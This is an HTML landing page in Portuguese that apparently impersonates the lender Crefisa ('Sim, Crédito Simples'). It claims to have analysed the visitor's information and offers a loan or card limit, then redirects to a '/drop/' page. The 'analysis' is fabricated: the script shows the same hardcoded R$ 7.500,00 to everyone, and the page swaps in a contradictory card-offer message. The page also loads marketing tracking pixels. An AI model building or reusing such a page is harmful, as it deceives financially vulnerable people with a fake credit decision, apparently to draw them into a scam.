<!DOCTYPE html><html lang="pt-BR">
    
    <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
    <script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-subids
  async
  defer
></script>            
<script>
    window.pixelId = "6768736b2226da3b4933a2c9";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);
  </script>
    <head>
<script type="text/javascript" async="" src="js/events.js"></script><script type="text/javascript" async="" src="js/events_2.js"></script><script type="text/javascript" async="" src="js/events_1.js"></script><script async="" src="js/fbevents.js"></script>

    <meta charset="UTF-8">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <style>
        .header {
            background: white;
            color: white;
            padding: 15px 0;
            text-align: center;
            font-size: 1.5rem;
            font-weight: bold;
            grid-area: top-bar;
        }

        .main-content {
            max-width: 450px;
            background-color: white;
            text-align: center;
            padding: 2rem 2rem 1rem 2rem;
            border-radius: 10px;
            box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
            margin: 0 auto;
        }

        .main-content h2 {
            margin-bottom: 20px;
        }

        .btn-custom {
            color: white;
            border: none;
            width: 100%;
            margin-bottom: 10px;
            background: #FE0064;
            font-weight: 600;
            border-radius: 1rem;
            padding: .75rem 3rem;
            letter-spacing: .3px;
            line-height: 1.15;
        }

        .btn-custom:hover {
            color: white !important;
            background-color: #FE0064 !important;
            transform: scale(1.02) !important;
        }

        .footer {
            background-color: #ffffff;
            border-top: solid 1px #e6dddd;
            color: #000;
            text-align: center;
            width: 100%;
            bottom: 0;
            grid-area: footer;
            border-bottom: solid 3px #e6007e;
            padding: 2rem 0.5rem;
            position: relative;
            margin-top: 50px;
        }

        #conclusao {
            display: none;
            /* Esconde o elemento por padrão */
        }

        #conclusao h4 {
            color: green;
            /* Define a cor do texto */
            font-weight: bold;
            /* Define o texto em negrito */
        }

        .char {
            border-top: solid px #00adca;
            background-color: #fff;
            padding: 2px !important;
        }

        /* End custom CSS */
    </style>
   
   <script>
    window.pixelId = "673155e68fbe3d2e8c3ee6c3";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);
  </script>
  <script
    src="https://cdn.utmify.com.br/scripts/utms/latest.js"
    data-utmify-prevent-subids
    async
    defer
  ></script>
  <!-- Meta Pixel Code -->
  <script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '1465888330757986');
  fbq('track', 'PageView');
  </script>
  <noscript><img height="1" width="1" style="display:none"
  src="https://www.facebook.com/tr?id=1465888330757986&ev=PageView&noscript=1"
  /></noscript>
  <!-- End Meta Pixel Code -->

</head>

<body>
    <div style="
    display: grid;
    grid-template-areas:
      'top-bar'
      'content'
      'footer';
    grid-template-rows: auto 1fr auto;
    min-height: 100vh;
  ">
        <div class="header">
            <img decoding="async" style="width: 120px;" src="images/Crefisa.png" alt="Imagem Centralizada" data-lazy-src="https://upload.wikimedia.org/wikipedia/pt/a/a3/Crefisa.png" data-ll-status="loaded" class="entered lazyloaded"><noscript><img decoding="async" style="width: 120px;"
                    src="../wikipedia/pt/a/a3/Crefisa-3.png" alt="Imagem Centralizada"></noscript>
        </div>

        <div style="grid-area: content; padding: 0 1rem;">
            <div style="margin-top: 40px;" class="main-content">
                <div id="analise-secao" class="mb-3" style="display: block;">
                    <p id="mensagem-analise"><strong></strong> Analisamos suas informações e notamos que você <strong>
                            não possui um vínculo ativo com a SIM há mais de 5 anos. </strong> Sendo assim, não conseguimos <strong>
                            liberar valores </strong> acima de R$ 20.000,00. Mas não se preocupe, nosso sistema consegue
                        liberar um empréstimo para você com um valor de até:</p>
                    <div style="background-color: #f0f0f0; padding: 15px; border-radius: 8px;" class="justify-content-center">
                        <p id="mostraValor" style="font-size: 22px; font-weight: 600;">R$ ****</p>
                        <button onclick="verLimite()" class="show-limite" id="edab37aa-8d4e-7255-9820-4ff1a573e239"> ver
                            valor <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--mdi" data-v-26951280="" style="" width="1em" height="1em" viewBox="0 0 24 24">
                                <path fill="currentColor" d="M12 9a3 3 0 0 1 3 3a3 3 0 0 1-3 3a3 3 0 0 1-3-3a3 3 0 0 1 3-3m0-4.5c5 0 9.27 3.11 11 7.5c-1.73 4.39-6 7.5-11 7.5S2.73 16.39 1 12c1.73-4.39 6-7.5 11-7.5M3.18 12a9.821 9.821 0 0 0 17.64 0a9.821 9.821 0 0 0-17.64 0">
                                </path>
                            </svg></button>
                    </div>
                    <p>Podemos prosseguir com a solicitação do empréstimo?</p>
                    <button class="btn-custom rounded-pill" onclick="redirectToDrop()">Sim, podemos!</button>

<script>
    function redirectToDrop() {
        // Captura os parâmetros UTM da URL atual
        const urlParams = new URLSearchParams(window.location.search);
        const utmParams = urlParams.toString();

        // Constrói a nova URL com os parâmetros UTM, se existirem
        let redirectUrl = '/drop/';
        if (utmParams) {
            redirectUrl += '?' + utmParams;
        }

        // Redireciona para a nova URL
        window.location.href = redirectUrl;
    }
</script>

                </div>
            </div>


            <script>
                function mostrarPagina(paginaId) {
                    // Esconde todas as seções
                    document.getElementById('analise-secao').style.display = 'none';

                    // Verifica se 'dadosUsuarioUni' existe no localStorage
                    const dadosUsuario = localStorage.getItem('dadosUsuarioUni');
                    if (dadosUsuario) {
                        const dados = JSON.parse(dadosUsuario);
                        const primeiroNome = dados.nome.split(' ')[0]; // Obtém o primeiro nome
                        console.log("usuarios==>", primeiroNome);
                        if (paginaId === 'analise-secao') {
                            // Atualiza a mensagem de análise com o nome do usuário
                            const mensagemAnalise = `<strong>${primeiroNome}</strong>, analisamos suas informações e notamos que este é o <strong> primeiro cartão </strong> que você solicita conosco. Sendo assim, não conseguimos <strong> liberar limites </strong> acima de R$ 5.000,00. Mas não se preocupe, nosso sistema consegue liberar um cartão para você com um limite de até:`;
                            document.getElementById('mensagem-analise').innerHTML = mensagemAnalise;
                        }
                    }

                    // Mostra a seção desejada
                    document.getElementById(paginaId).style.display = 'block';
                }

                function verLimite() {
                    document.getElementById('mostraValor').innerHTML = "R$ 7.500,00";
                    // alert("O seu limite é de R$ 4.600,00"); // Exemplo de limite. Substitua pelo valor real conforme necessário.
                }

                // Chamar a função onde for necessário, por exemplo, ao carregar uma nova seção
                mostrarPagina('analise-secao');
            </script>
        </div>
        <div class="footer py-4" id="footerChg">
            © 2024 Sim, Crédito Simples <br>
            Todos os direitos reservados
        </div>
    </div>




<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>



</body></html>